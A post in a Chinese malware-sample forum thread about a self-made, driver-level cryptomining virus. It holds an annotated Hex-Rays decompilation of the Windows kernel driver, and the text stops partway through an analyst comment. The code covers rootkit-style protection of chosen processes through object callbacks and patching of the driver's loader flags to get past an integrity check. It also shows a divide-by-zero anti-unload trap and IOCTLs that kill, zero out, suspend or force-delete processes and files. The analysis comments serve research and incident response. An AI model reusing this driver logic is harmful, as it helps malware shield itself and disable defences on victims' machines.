楼主: TheYuCheng

[病毒样本] 自制驱动级挖矿病毒

wowocock
发表于 2018-3-22 14:46:00 | 显示全部楼层
/* This file has been generated by the Hex-Rays decompiler.
   Copyright (c) 2007-2017 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

#define __thiscall __cdecl // Test compile in C mode

// Analyst map of the routines declared below, taken from the bodies further
// down this listing (sub_* names are decompiler-assigned; the declared name
// ProcesssCreateNotify is shown as ProcesssCreateNotifyEx where its body is
// printed):
//   sub_401000 / sub_401110      add / remove an image name in word_4041B8
//   sub_401050 / sub_4011C0      add / remove a process id in dword_404018
//   CheckImageFileName           linear lookup in the image-name table
//   sub_4017C0                   linear lookup in the PID table
//   CheckImageFileNameStub,
//   sub_401F30                   boolean wrappers around those lookups
//   DrvDispatch                  no-op IRP_MJ_CREATE / IRP_MJ_CLOSE handler
//   DeviceControlDispatch        IOCTL switch -- the user-mode control surface
//   DriverEntry / DrvUnload      setup and teardown
//   sub_4010C0 / sub_401E70      ZwDeleteFile / IoCreateFile on a wide path
//   sub_401800                   closes other processes' handles to a file
//   Deletefile                   forced delete (handle close + disposition IRP)
//   DestroyProcByZeromemory      attaches to a process and zeroes its user memory
//   ProcessCallBack              ObRegisterCallbacks pre-op for process handles
//   RegisterProcessCallbacks,
//   RegisterThreadCallbacks      ObRegisterCallbacks setup (altitude "321000")
//   sub_402330                   resolves a symbolic-link object to its target
//   sub_402420                   completion routine for Deletefile's IRP
//   TerminateProcessById         body starts at the very end of this listing
//   ThreadCallback, IogetcurrentIrpstacklocation, sub_402640, sub_402670,
//   sub_402998, sub_4029FC, sub_402A14, sub_402A30, sub_402A4C:
//                                bodies not included in this listing
char __stdcall sub_401000(const wchar_t **a1);
char __stdcall sub_401050(int a1);
NTSTATUS __stdcall DrvDispatch(int a1, PIRP Irp);
NTSTATUS __stdcall sub_4010C0(PCWSTR SourceString);
char __stdcall sub_401110(const wchar_t **a1);
char __stdcall sub_4011C0(int a1);
NTSTATUS __stdcall DeviceControlDispatch(int a1, PIRP Irp);
NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath);
int __thiscall DrvUnload(void *this, int a2);
signed int __stdcall CheckImageFileName(const wchar_t **a1);
signed int __stdcall sub_4017C0(int a1);
char __stdcall sub_401800(int a1);
char __stdcall Deletefile(PCWSTR SourceString);
NTSTATUS __stdcall sub_401E70(PCWSTR SourceString, PHANDLE FileHandle, ACCESS_MASK DesiredAccess, ULONG ShareAccess);
bool __stdcall CheckImageFileNameStub(int ImageFileName); // idb
bool __stdcall sub_401F30(int a1);
int __stdcall DestroyProcByZeromemory(int a1);
void __stdcall ProcesssCreateNotify(int a1, int a2, int CreateInfo); // idb
int __stdcall ProcessCallBack(int, int); // weak
int RegisterProcessCallbacks();
int RegisterThreadCallbacks();
int __stdcall sub_402330(int, PUNICODE_STRING LinkTarget); // idb
int __stdcall sub_402420(int, PIRP Irp, int); // idb
NTSTATUS __stdcall TerminateProcessById(void *a1);
int __stdcall ThreadCallback(int, int); // weak
int __stdcall IogetcurrentIrpstacklocation(int a1);
int __stdcall sub_402640(int a1);
int __stdcall sub_402670(int a1, int a2, int a3, char a4, unsigned __int8 a5, char a6);
// int __report_rangecheckfailure(void); weak
// int __cdecl stricmp(const char *, const char *);
// wchar_t *__cdecl wcsncpy(wchar_t *Dest, const wchar_t *Source, size_t Count);
// int __cdecl wcsnicmp(const wchar_t *, const wchar_t *, size_t);
// ULONG DbgPrint(PCSTR Format, ...);
// int __stdcall ObQueryNameString(_DWORD, _DWORD, _DWORD, _DWORD); weak
// void *__cdecl memset(void *Dst, int Val, size_t Size);
// _DWORD __cdecl sub_402908(_DWORD, _DWORD, _DWORD); weak
signed int __cdecl sub_402998(int a1, unsigned int a2, int a3, unsigned int *a4);
int __thiscall sub_4029FC(int (__fastcall *this)(_DWORD, _DWORD));
int __thiscall sub_402A14(int (__fastcall *this)(_DWORD, _DWORD));
void __thiscall sub_402A30(PVOID TargetFrame);
int __fastcall sub_402A4C(int a1, int a2, int a3, int a4);
// _DWORD __stdcall _NLG_Notify(_DWORD); weak
// void __stdcall RtlUnwind(PVOID TargetFrame, PVOID TargetIp, PEXCEPTION_RECORD ExceptionRecord, PVOID ReturnValue);
// KIRQL __stdcall KeGetCurrentIrql();
// PKTHREAD __stdcall KeGetCurrentThread();
// void __stdcall RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
// NTSTATUS __stdcall RtlAnsiStringToUnicodeString(PUNICODE_STRING DestinationString, PCANSI_STRING SourceString, BOOLEAN AllocateDestinationString);
// LONG __stdcall RtlCompareUnicodeString(PCUNICODE_STRING String1, PCUNICODE_STRING String2, BOOLEAN CaseInSensitive);
// void __stdcall RtlCopyUnicodeString(PUNICODE_STRING DestinationString, PCUNICODE_STRING SourceString);
// NTSTATUS __stdcall RtlAppendUnicodeStringToString(PUNICODE_STRING Destination, PCUNICODE_STRING Source);
// void __stdcall RtlFreeUnicodeString(PUNICODE_STRING UnicodeString);
// void __stdcall KeInitializeEvent(PRKEVENT Event, EVENT_TYPE Type, BOOLEAN State);
// LONG __stdcall KeSetEvent(PRKEVENT Event, KPRIORITY Increment, BOOLEAN Wait);
// NTSTATUS __stdcall KeWaitForSingleObject(PVOID Object, KWAIT_REASON WaitReason, KPROCESSOR_MODE WaitMode, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
// PVOID __stdcall ExAllocatePoolWithTag(POOL_TYPE PoolType, SIZE_T NumberOfBytes, ULONG Tag);
// void __stdcall ExFreePoolWithTag(PVOID P, ULONG Tag);
// PIRP __stdcall IoAllocateIrp(CCHAR StackSize, BOOLEAN ChargeQuota);
// NTSTATUS __fastcall IofCallDriver(PDEVICE_OBJECT DeviceObject, PIRP Irp);
// void __fastcall IofCompleteRequest(PIRP Irp, CCHAR PriorityBoost);
// NTSTATUS __stdcall IoCreateDevice(PDRIVER_OBJECT DriverObject, ULONG DeviceExtensionSize, PUNICODE_STRING DeviceName, ULONG DeviceType, ULONG DeviceCharacteristics, BOOLEAN Exclusive, PDEVICE_OBJECT *DeviceObject);
// NTSTATUS __stdcall IoCreateFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG Disposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength, CREATE_FILE_TYPE CreateFileType, PVOID ExtraCreateParameters, ULONG Options);
// NTSTATUS __stdcall IoCreateSymbolicLink(PUNICODE_STRING SymbolicLinkName, PUNICODE_STRING DeviceName);
// void __stdcall IoDeleteDevice(PDEVICE_OBJECT DeviceObject);
// NTSTATUS __stdcall IoDeleteSymbolicLink(PUNICODE_STRING SymbolicLinkName);
// void __stdcall IoFreeIrp(PIRP Irp);
// PDEVICE_OBJECT __stdcall IoGetRelatedDeviceObject(PFILE_OBJECT FileObject);
// NTSTATUS __stdcall ObReferenceObjectByHandle(HANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode, PVOID *Object, POBJECT_HANDLE_INFORMATION HandleInformation);
// int __stdcall ObRegisterCallbacks(_DWORD, _DWORD); weak
// int __fastcall ObUnRegisterCallbacks(_DWORD, _DWORD, _DWORD); weak
// int __cdecl ObGetFilterVersion(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD); weak
// NTSTATUS __stdcall ZwClose(HANDLE Handle);
// NTSTATUS __stdcall ZwOpenSymbolicLinkObject(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
// NTSTATUS __stdcall ZwQuerySymbolicLinkObject(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength);
// NTSTATUS __stdcall RtlCharToInteger(PCSZ String, ULONG Base, PULONG Value);
// int __stdcall PsSetCreateProcessNotifyRoutineEx(_DWORD, _DWORD); weak
// int __stdcall PsGetProcessId(_DWORD); weak
// NTSTATUS __stdcall ZwTerminateProcess(HANDLE ProcessHandle, NTSTATUS ExitStatus);
// NTSTATUS __stdcall ZwOpenProcess(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
// int __stdcall KeAttachProcess(_DWORD); weak
// int KeDetachProcess(void); weak
// int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD); weak
// NTSTATUS __stdcall ZwDeleteFile(POBJECT_ATTRIBUTES ObjectAttributes);
// NTSTATUS __stdcall ZwDuplicateObject(HANDLE SourceProcessHandle, HANDLE SourceHandle, HANDLE TargetProcessHandle, PHANDLE TargetHandle, ACCESS_MASK DesiredAccess, ULONG HandleAttributes, ULONG Options);
// NTSTATUS __stdcall ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, SIZE_T Length, PSIZE_T ResultLength);
// int __stdcall PsSuspendProcess(_DWORD); weak
// int __stdcall PsResumeProcess(_DWORD); weak
// LONG_PTR __fastcall ObfDereferenceObject(PVOID Object);

//-------------------------------------------------------------------------
// Data declarations

// ---- Global state of the driver, as used by the bodies below ----------------
_UNKNOWN loc_402A45; // weak
// Two NUL bytes; sub_401800 stores their address in v15 (an empty buffer).
char byte_402A98[2] = { '\0', '\0' }; // weak
// A single L'\\' (92). sub_401800 passes its address to RtlInitUnicodeString as
// the prefix of the symbolic-link name it resolves, so the listing presumably
// shows only the first character of a longer wide string -- confirm in the
// binary's data section.
const WCHAR SourceString = 92u; // idb
// Format string handed to DbgPrint at the end of DriverEntry.
CHAR Format[1] = "\n"; // idb
// extern POBJECT_TYPE *IoFileObjectType;
// extern _UNKNOWN PsProcessType; weak
// extern _UNKNOWN PsThreadType; weak
// Immediately precedes dword_404018: sub_4011C0 reads dword_404014[count],
// which aliases dword_404018[count - 1] (the last live PID entry), to do a
// swap-with-last removal.
int dword_404014[] = { 0 }; // weak
// "Protected PID" table. Filled by sub_401050 (IOCTL 2278772), searched by
// sub_4017C0 / sub_401F30, consulted by ProcessCallBack when stripping access
// rights from new process handles. 100 slots; insertion does not bounds-check.
int dword_404018[100] =
{
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0,
  0
}; // idb
// Number of live entries in dword_404018.
int dword_4041A8 = 0; // weak
// Registration handles returned by ObRegisterCallbacks for the process-type
// (dword_4041AC) and thread-type (dword_4041B0) callbacks; DrvUnload passes
// both to ObUnRegisterCallbacks.
int dword_4041AC = 0; // weak
int dword_4041B0 = 0; // weak
// Number of live entries in word_4041B8.
int dword_4041B4 = 0; // weak
// "Protected image name" table: 100 slots of 1024 wide chars, addressed as
// word_4041B8[1024 * slot]. Filled by sub_401000 (IOCTL 2278800), cleared by
// sub_401110, searched case-insensitively by CheckImageFileName. The decompiler
// prints only the first 36 of the 102400 zero initialisers.
wchar_t word_4041B8[102400] =
{
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,
  0u,

}; // idb
// Unload-permission flag: stays 0 until IOCTL 2278896 arrives with the input
// string "Unload."; DrvUnload divides by it (see the note there).
int dword_4361B8; // weak


//----- (00401000) --------------------------------------------------------
// Adds an image name to the protected-name table word_4041B8 unless it is
// already there (CheckImageFileNameStub).
//   a1: UNICODE_STRING-like record -- *(USHORT *)a1 is the byte length and
//       a1[1] the wide-char buffer. DeviceControlDispatch passes the address
//       of a UNICODE_STRING it converted from the IOCTL's ANSI input.
//   Returns the new entry count (truncated to char) after an insert, or the
//   non-zero stub result when the name was already present; callers cannot
//   tell the two cases apart from the return value.
// There is no upper-bound check on dword_4041B4 against the 100 slots.
char __stdcall sub_401000(const wchar_t **a1)
{
  char result; // al

  result = CheckImageFileNameStub((int)a1);
  if ( !result )
  {
    // Copies exactly Length/2 wide chars into the next 1024-wchar slot, so no
    // terminator is written; the slot relies on being zero-filled beforehand.
    wcsncpy(&word_4041B8[1024 * dword_4041B4], a1[1], *(unsigned __int16 *)a1 / 2);
    result = dword_4041B4++ + 1;
  }
  return result;
}
// 4041B4: using guessed type int dword_4041B4;

//----- (00401050) --------------------------------------------------------
// Adds process id a1 to the protected-PID table dword_404018 unless it is
// already present (sub_401F30).
//   Returns a1 truncated to char after an insert, otherwise the non-zero
//   result of sub_401F30 -- not a usable success flag (a PID whose low byte is
//   0 reads as failure).
// No bounds check against the table's 100 slots.
char __stdcall sub_401050(int a1)
{
  char result; // al

  result = sub_401F30(a1);
  if ( !result )
  {
    result = a1;
    dword_404018[dword_4041A8++] = a1;
  }
  return result;
}
// 4041A8: using guessed type int dword_4041A8;

//----- (00401090) --------------------------------------------------------
// Handler installed by DriverEntry for IRP_MJ_CREATE (0) and IRP_MJ_CLOSE (2):
// completes the request at once with STATUS_SUCCESS and no transferred bytes.
//   a1: device object, unused.
//   Returns the status read back from the IRP after IofCompleteRequest (the
//   decompiled original reads it after completion as well).
NTSTATUS __stdcall DrvDispatch(int a1, PIRP Irp)
{
  PIO_STATUS_BLOCK iosb = &Irp->IoStatus;

  iosb->Status = 0;
  iosb->Information = 0;
  IofCompleteRequest(Irp, 0);
  return iosb->Status;
}

//----- (004010C0) --------------------------------------------------------
// Deletes the file named by SourceString with ZwDeleteFile.
//   SourceString: NUL-terminated wide NT path (Deletefile passes the path it
//                 received through the IOCTL after ANSI->Unicode conversion).
//   Returns the ZwDeleteFile status (ignored by the caller).
// Attributes 576 = 0x240 = OBJ_KERNEL_HANDLE (0x200) | OBJ_CASE_INSENSITIVE (0x40).
NTSTATUS __stdcall sub_4010C0(PCWSTR SourceString)
{
  struct _OBJECT_ATTRIBUTES ObjectAttributes; // [esp+0h] [ebp-20h]
  LSA_UNICODE_STRING DestinationString; // [esp+18h] [ebp-8h]

  RtlInitUnicodeString(&DestinationString, SourceString);
  ObjectAttributes.Length = 24;
  ObjectAttributes.RootDirectory = 0;
  ObjectAttributes.Attributes = 576;
  ObjectAttributes.ObjectName = &DestinationString;
  ObjectAttributes.SecurityDescriptor = 0;
  ObjectAttributes.SecurityQualityOfService = 0;
  return ZwDeleteFile(&ObjectAttributes);
}

//----- (00401110) --------------------------------------------------------
// Removes an image name from word_4041B8 (inverse of sub_401000).
//   a1: same UNICODE_STRING-like record as sub_401000.
//   Returns 0 when the name is not in the table; otherwise the low byte of
//   the pointer memset() returns, which carries no meaning for callers.
// Swap-with-last removal: the matching slot is zeroed, the last slot is copied
// over it, the last slot is zeroed and the count decremented. When the match
// is itself the last slot the copy is onto the already-cleared slot, which is
// harmless.
char __stdcall sub_401110(const wchar_t **a1)
{
  char result; // al
  signed int v2; // ST0C_4

  result = CheckImageFileNameStub((int)a1);
  if ( result )
  {
    // v2 is the slot index; the stub just confirmed it is >= 0.
    v2 = CheckImageFileName(a1);
    memset(&word_4041B8[1024 * v2], 0, 0x400u);
    wcsncpy(&word_4041B8[1024 * v2], &word_4041B8[1024 * (dword_4041B4 - 1)], 0x400u);
    result = (unsigned int)memset(&word_4041B8[1024 * (dword_4041B4 - 1)], 0, 0x400u);
    --dword_4041B4;
  }
  return result;
}
// 4041B4: using guessed type int dword_4041B4;

//----- (004011C0) --------------------------------------------------------
// Removes process id a1 from dword_404018 (inverse of sub_401050).
//   Returns 0 when a1 is not in the table, otherwise the decremented count
//   (truncated to char).
// Swap-with-last removal: the slot found by sub_4017C0 is overwritten with the
// last live entry, read as dword_404014[count] -- dword_404014 immediately
// precedes dword_404018, so that expression is dword_404018[count - 1].
char __stdcall sub_4011C0(int a1)
{
  char result; // al

  result = sub_401F30(a1);
  if ( result )
  {
    dword_404018[sub_4017C0(a1)] = dword_404014[dword_4041A8];
    result = dword_4041A8-- - 1;
  }
  return result;
}
// 404014: using guessed type int dword_404014[];
// 4041A8: using guessed type int dword_4041A8;

//----- (00401210) --------------------------------------------------------
// IRP_MJ_DEVICE_CONTROL handler: the user-mode control surface of the driver.
//   a1: device object (unused); Irp: the request.
//   Returns the status left in the IRP after completion.
// The control codes 2278768..2278808 (step 4) and 2278896 all have the low two
// bits clear, i.e. METHOD_BUFFERED on device type 0x22, so the ANSI input is
// in AssociatedIrp.SystemBuffer -- the decompiler shows the same union slot as
// MasterIrp (String). Neither the input length (Irpsp[2]) nor the output
// length (Irpsp[1]) is checked before strlen()/RtlCharToInteger() walk the
// buffer, and the RtlCharToInteger statuses are ignored, so a malformed
// request drives the handlers below with an unchecked or uninitialised value.
// The ANSI_STRING Length written for the path IOCTLs is strlen(String); v8-v13
// and v28-v30 are temporaries of that computation.
NTSTATUS __stdcall DeviceControlDispatch(int a1, PIRP Irp)
{
  int v2; // ST10_4
  int v3; // ST0C_4
  LSA_UNICODE_STRING v5; // [esp+8h] [ebp-88h]
  LSA_UNICODE_STRING UnicodeString; // [esp+10h] [ebp-80h]
  LSA_UNICODE_STRING DestinationString; // [esp+18h] [ebp-78h]
  int v8; // [esp+20h] [ebp-70h]
  PCSZ v9; // [esp+24h] [ebp-6Ch]
  int v10; // [esp+28h] [ebp-68h]
  PCSZ v11; // [esp+2Ch] [ebp-64h]
  int v12; // [esp+30h] [ebp-60h]
  PCSZ v13; // [esp+34h] [ebp-5Ch]
  int v14; // [esp+38h] [ebp-58h]
  ULONG v15; // [esp+3Ch] [ebp-54h]
  int v16; // [esp+40h] [ebp-50h]
  ULONG v17; // [esp+44h] [ebp-4Ch]
  ULONG v18; // [esp+48h] [ebp-48h]
  ULONG v19; // [esp+4Ch] [ebp-44h]
  ULONG v20; // [esp+50h] [ebp-40h]
  ULONG Value; // [esp+54h] [ebp-3Ch]
  int v22; // [esp+58h] [ebp-38h]
  struct _STRING v23; // [esp+5Ch] [ebp-34h]
  struct _STRING v24; // [esp+64h] [ebp-2Ch]
  struct _STRING SourceString; // [esp+6Ch] [ebp-24h]
  _DWORD *Irpsp; // [esp+74h] [ebp-1Ch]
  int v27; // [esp+78h] [ebp-18h]
  const char *v28; // [esp+7Ch] [ebp-14h]
  const char *v29; // [esp+80h] [ebp-10h]
  const char *v30; // [esp+84h] [ebp-Ch]
  PCSZ String; // [esp+8Ch] [ebp-4h]

  // Irpsp[3] is Parameters.DeviceIoControl.IoControlCode on x86; Irpsp[2] and
  // Irpsp[1] (input/output buffer lengths) are read into v2/v3 and never used.
  Irpsp = (_DWORD *)IogetcurrentIrpstacklocation((int)Irp);
  v22 = Irpsp[3];
  v2 = Irpsp[2];
  v3 = Irpsp[1];
  String = (PCSZ)Irp->AssociatedIrp.MasterIrp;
  Irp->IoStatus.Information = 0;
  Irp->IoStatus.Status = 0;
  // Jump-table offset left over from the compiled switch; unused.
  v27 = v22 - 2278768;
  switch ( v22 )
  {
    // Accepted with STATUS_SUCCESS, no action.
    case 2278768:
    case 2278808:
      break;
    // Decimal PID string -> add to the protected-PID table.
    case 2278772:
      RtlCharToInteger(String, 0xAu, &Value);
      sub_401050(Value);
      break;
    // Decimal PID string -> remove from the protected-PID table.
    case 2278776:
      RtlCharToInteger(String, 0xAu, &v20);
      sub_4011C0(v20);
      break;
    // Terminate a process by PID (TerminateProcessById, body at end of listing).
    case 2278780:
      RtlCharToInteger(String, 0xAu, &v19);
      TerminateProcessById((void *)v19);
      break;
    // Attach to the process and zero its user address space.
    case 2278784:
      RtlCharToInteger(String, 0xAu, &v18);
      DestroyProcByZeromemory(v18);
      break;
    // Suspend / resume by PID through the non-DDK exports PsSuspendProcess /
    // PsResumeProcess. The EPROCESS reference taken by
    // PsLookupProcessByProcessId is never released, and v16/v14 are used even
    // when the lookup fails.
    case 2278788:
      RtlCharToInteger(String, 0xAu, &v17);
      PsLookupProcessByProcessId(v17, &v16);
      PsSuspendProcess(v16);
      break;
    case 2278792:
      RtlCharToInteger(String, 0xAu, &v15);
      PsLookupProcessByProcessId(v15, &v14);
      PsResumeProcess(v14);
      break;
    // NUL-terminated ANSI path -> Unicode -> forced delete (Deletefile).
    case 2278796:
      SourceString.MaximumLength = 1024;
      SourceString.Buffer = (PCHAR)String;
      v30 = String;
      v13 = String + 1;
      v30 += strlen(v30) + 1;
      v12 = v30 - (String + 1);
      SourceString.Length = (_WORD)v30 - ((_WORD)String + 1);
      RtlAnsiStringToUnicodeString(&DestinationString, &SourceString, 1u);
      Deletefile(DestinationString.Buffer);
      RtlFreeUnicodeString(&DestinationString);
      break;
    // ANSI image path -> Unicode -> add to the protected-name table.
    case 2278800:
      v24.MaximumLength = 1024;
      v24.Buffer = (PCHAR)String;
      v29 = String;
      v11 = String + 1;
      v29 += strlen(v29) + 1;
      v10 = v29 - (String + 1);
      v24.Length = (_WORD)v29 - ((_WORD)String + 1);
      RtlAnsiStringToUnicodeString(&UnicodeString, &v24, 1u);
      sub_401000((const wchar_t **)&UnicodeString);
      RtlFreeUnicodeString(&UnicodeString);
      break;
    // ANSI image path -> Unicode -> remove from the protected-name table.
    case 2278804:
      v23.MaximumLength = 1024;
      v23.Buffer = (PCHAR)String;
      v28 = String;
      v9 = String + 1;
      v28 += strlen(v28) + 1;
      v8 = v28 - (String + 1);
      v23.Length = (_WORD)v28 - ((_WORD)String + 1);
      RtlAnsiStringToUnicodeString(&v5, &v23, 1u);
      sub_401110((const wchar_t **)&v5);
      RtlFreeUnicodeString(&v5);
      break;
    // The literal "Unload." arms dword_4361B8, which DrvUnload divides by.
    case 2278896:
      if ( !stricmp(String, "Unload.") )
        dword_4361B8 = 1;
      break;
    // 0xC000000D = STATUS_INVALID_PARAMETER for any other code.
    default:
      Irp->IoStatus.Status = 0xC000000D;
      break;
  }
  IofCompleteRequest(Irp, 0);
  return Irp->IoStatus.Status;
}
// 4030A4: using guessed type int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD);
// 4030B8: using guessed type int __stdcall PsSuspendProcess(_DWORD);
// 4030BC: using guessed type int __stdcall PsResumeProcess(_DWORD);
// 4361B8: using guessed type int dword_4361B8;

//----- (004015E0) --------------------------------------------------------
// Driver entry point. Every call's return value is ignored.
//   1. Install DrvUnload.
//   2. OR 0x20 into the dword at offset 0x34 of DriverObject->DriverSection
//      (the driver's loader data table entry). On x86 that offset is the
//      entry's Flags field, and 0x20 is the bit the kernel checks when
//      ObRegisterCallbacks validates that the image was linked with
//      /INTEGRITYCHECK -- presumably this is how the callbacks below get
//      accepted; confirm against the loader structure of the target OS. A
//      driver rewriting its own DriverSection at load time is a detection
//      signal in its own right.
//   3. Register the Ob handle callbacks for processes and threads and the
//      create-process notify routine (ProcesssCreateNotify; its body appears
//      below as ProcesssCreateNotifyEx).
//   4. Create a FILE_DEVICE_UNKNOWN (0x22) device and a symbolic link. The
//      names are 15 and 19 wide chars (Length 30 / 38) but the listing shows
//      only "\\"; the real strings live in the binary's data section.
//   5. Clear DO_DEVICE_INITIALIZING (0x80), route IRP_MJ_DEVICE_CONTROL (14)
//      to DeviceControlDispatch and IRP_MJ_CREATE (0) / IRP_MJ_CLOSE (2) to
//      DrvDispatch.
//   6. DbgPrint(Format), Format being "\n".
//   Always returns STATUS_SUCCESS; if IoCreateDevice failed, DeviceObject is
//   uninitialised when its Flags are written.
NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
  LSA_UNICODE_STRING SymbolicLinkName; // [esp+0h] [ebp-14h]
  LSA_UNICODE_STRING DeviceName; // [esp+8h] [ebp-Ch]
  PDEVICE_OBJECT DeviceObject; // [esp+10h] [ebp-4h]

  DriverObject->DriverUnload = (PDRIVER_UNLOAD)DrvUnload;
  *((_DWORD *)DriverObject->DriverSection + 13) |= 0x20u;
  RegisterProcessCallbacks();
  RegisterThreadCallbacks();
  PsSetCreateProcessNotifyRoutineEx(ProcesssCreateNotify, 0);
  DeviceName.Length = 30;
  DeviceName.MaximumLength = 32;
  DeviceName.Buffer = (PWSTR)"\\";
  SymbolicLinkName.Length = 38;
  SymbolicLinkName.MaximumLength = 40;
  SymbolicLinkName.Buffer = (PWSTR)"\\";
  IoCreateDevice(DriverObject, 0, &DeviceName, 0x22u, 0, 0, &DeviceObject);
  IoCreateSymbolicLink(&SymbolicLinkName, &DeviceName);
  DeviceObject->Flags &= 0xFFFFFF7F;
  DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)DeviceControlDispatch;
  DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)DrvDispatch;
  DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)DrvDispatch;
  DbgPrint(Format);
  return 0;
}
// 40308C: using guessed type int __stdcall PsSetCreateProcessNotifyRoutineEx(_DWORD, _DWORD);

//----- (004016E0) --------------------------------------------------------
// DriverUnload. Shown as __thiscall because the decompiler saw the driver
// object arrive in ecx: `this` and a2 are presumably the same PDRIVER_OBJECT
// (a2 + 4 is read as DriverObject->DeviceObject). v2 is never assigned -- an
// artefact of the guessed three-argument __fastcall prototype for
// ObUnRegisterCallbacks, whose documented form takes only the registration
// handle (dword_4041AC for processes, dword_4041B0 for threads).
// As decompiled, the first two statements divide by dword_4361B8. That flag is
// 0 until IOCTL 2278896 ("Unload.") sets it, so an unload that was not armed
// through the device interface would hit an integer divide-by-zero in kernel
// mode -- presumably a deliberate anti-unload guard (decompilers emit this
// form for an idiv); confirm in the disassembly. For incident response this
// means a plain service stop / driver unload of this sample can bugcheck the
// host.
int __thiscall DrvUnload(void *this, int a2)
{
  int v2; // edx
  LSA_UNICODE_STRING SymbolicLinkName; // [esp+0h] [ebp-Ch]
  int v5; // [esp+8h] [ebp-4h]

  v5 = 0 / dword_4361B8;
  ObUnRegisterCallbacks(this, 0 % dword_4361B8, dword_4041AC);
  ObUnRegisterCallbacks(dword_4041B0, v2, dword_4041B0);
  // Second argument 1 = remove the notify routine installed in DriverEntry.
  PsSetCreateProcessNotifyRoutineEx(ProcesssCreateNotify, 1);
  // Same 19-wide-char link name as DriverEntry; only "\\" survives here.
  SymbolicLinkName.Length = 38;
  SymbolicLinkName.MaximumLength = 40;
  SymbolicLinkName.Buffer = (PWSTR)"\\";
  IoDeleteSymbolicLink(&SymbolicLinkName);
  if ( *(_DWORD *)(a2 + 4) )
    IoDeleteDevice(*(PDEVICE_OBJECT *)(a2 + 4));
  return 0;
}
// 403074: using guessed type int __fastcall ObUnRegisterCallbacks(_DWORD, _DWORD, _DWORD);
// 40308C: using guessed type int __stdcall PsSetCreateProcessNotifyRoutineEx(_DWORD, _DWORD);
// 4041AC: using guessed type int dword_4041AC;
// 4041B0: using guessed type int dword_4041B0;
// 4361B8: using guessed type int dword_4361B8;

//----- (00401760) --------------------------------------------------------
// Linear search of word_4041B8 for the image name a1 (UNICODE_STRING-like:
// byte length at +0, wide-char buffer at +4).
//   Returns the slot index, or -1 when absent.
// The comparison is case-insensitive and limited to Length/2 wide chars of the
// incoming name, so a stored entry that is longer still matches when it begins
// with the incoming name. ProcesssCreateNotifyEx passes the full image path
// from PS_CREATE_NOTIFY_INFO here, so stored names are expected to be full
// NT paths as well.
signed int __stdcall CheckImageFileName(const wchar_t **a1)
{
  int i; // [esp+0h] [ebp-4h]

  for ( i = 0; i < dword_4041B4; ++i )
  {
    if ( !wcsnicmp(&word_4041B8[1024 * i], a1[1], *(unsigned __int16 *)a1 / 2) )
      return i;
  }
  return -1;
}
// 4041B4: using guessed type int dword_4041B4;

//----- (004017C0) --------------------------------------------------------
// Linear search of the protected-PID table dword_404018 for a1.
//   Returns the slot index, or -1 when absent.
// As decompiled the test reads `dword_404018 == a1` -- the array's address
// against an int -- which cannot be what the binary does; presumably
// dword_404018[i]. Confirm in the disassembly before relying on this lookup.
signed int __stdcall sub_4017C0(int a1)
{
  int i; // [esp+0h] [ebp-4h]

  for ( i = 0; i < dword_4041A8; ++i )
  {
    if ( dword_404018 == a1 )
      return i;
  }
  return -1;
}
// 4041A8: using guessed type int dword_4041A8;

//----- (00401800) --------------------------------------------------------
// Closes the handles other processes hold on the file a1 -- the "unlock" step
// Deletefile runs before deleting it.
//   a1: wide path. The code reads the 5th and 6th wide chars (a1 + 8, a1 + 10)
//       as drive letter and colon and everything from a1 + 12 as the rest of
//       the path, i.e. it expects a "\??\X:\..."-shaped string -- confirm.
//   Returns 1 when a matching handle was found and closed, 0 otherwise. The
//   value is assembled in the low byte of v1 and is not a clean boolean on
//   every path (some paths return the low byte of a Zw* status).
// Steps as decompiled:
//   1. ZwQuerySystemInformation(SystemHandleInformation) into a NonPagedPool
//      buffer (tag 0x46494C45) whose size doubles from 1 byte until the call
//      stops returning 0xC0000004 (STATUS_INFO_LENGTH_MISMATCH); any other
//      failure frees everything and returns v32 (still 0).
//   2. Build "\" + "X:" (prefix from the global SourceString), resolve that
